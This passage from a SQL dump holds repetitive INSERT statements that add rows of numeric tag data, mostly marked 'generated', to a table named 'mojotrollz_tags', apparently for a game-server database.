30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11439, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11440, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11440, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11441, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11441, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11441, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11442, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11442, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11443, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11443, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11444, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11444, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11444, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11445, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11445, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11445, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11446, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11446, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11446, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11447, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11448, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11448, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11448, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11450, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11451, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11451, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11451, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11452, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11452, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11452, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11453, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11453, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11453, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11454, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11454, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11454, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11455, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11455, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11455, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11456, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11456, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11456, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11457, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11457, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11457, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11458, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11458, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11458, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11459, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11459, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11459, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11460, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11460, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11460, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11461, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11461, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11461, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11462, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11462, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11462, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11464, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11464, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11464, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11465, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11465, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11465, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11466, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11466, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11466, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11467, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11469, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11469, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11469, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11470, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11470, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11470, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11471, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11471, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11471, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11472, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11472, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11472, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11473, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11473, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11473, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11475, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11475, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11475, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11476, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11476, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11476, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11477, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11477, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11477, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11480, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11480, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11480, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11483, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11483, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11483, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11484, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11484, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11484, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11486, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11486, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11486, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11487, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11487, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11487, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11488, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11488, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11488, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11489, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11489, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11489, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11490, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11490, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11490, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11491, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11491, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11491, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11492, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11492, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11492, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11494, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11496, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11496, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11496, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11497, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11498, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11501, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11501, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11501, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11502, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11516, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11516, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11517, 1, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11517, 1, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11517, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11518, 1, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11518, 1, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11518, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11519, 1, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11519, 1, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11519, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11520, 1, 1, 389, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11520, 1, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11520, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11521, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11536, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11536, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11546, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11546, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11547, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11548, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11548, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11551, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11551, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11552, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11553, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11553, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11554, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11554, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11555, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11555, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11556, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11556, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11557, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11557, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11558, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11558, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11559, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11559, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11560, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11561, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11561, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11562, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11562, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11563, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11563, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11564, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11564, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11576, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11576, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11577, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11577, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11578, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11578, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11582, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11582, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11583, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11596, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11596, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11598, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11600, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11600, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11600, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11602, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11603, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11603, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11603, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11604, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11604, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11604, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11605, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11605, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11605, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11608, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11608, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11609, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11609, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11610, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11610, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11611, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11611, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11613, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11613, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11614, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11614, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11615, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11615, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11616, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11616, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11620, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11620, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11621, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11621, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11622, 1, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11622, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11623, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11624, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11624, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11625, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11625, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11626, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11626, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11627, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (11628, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) 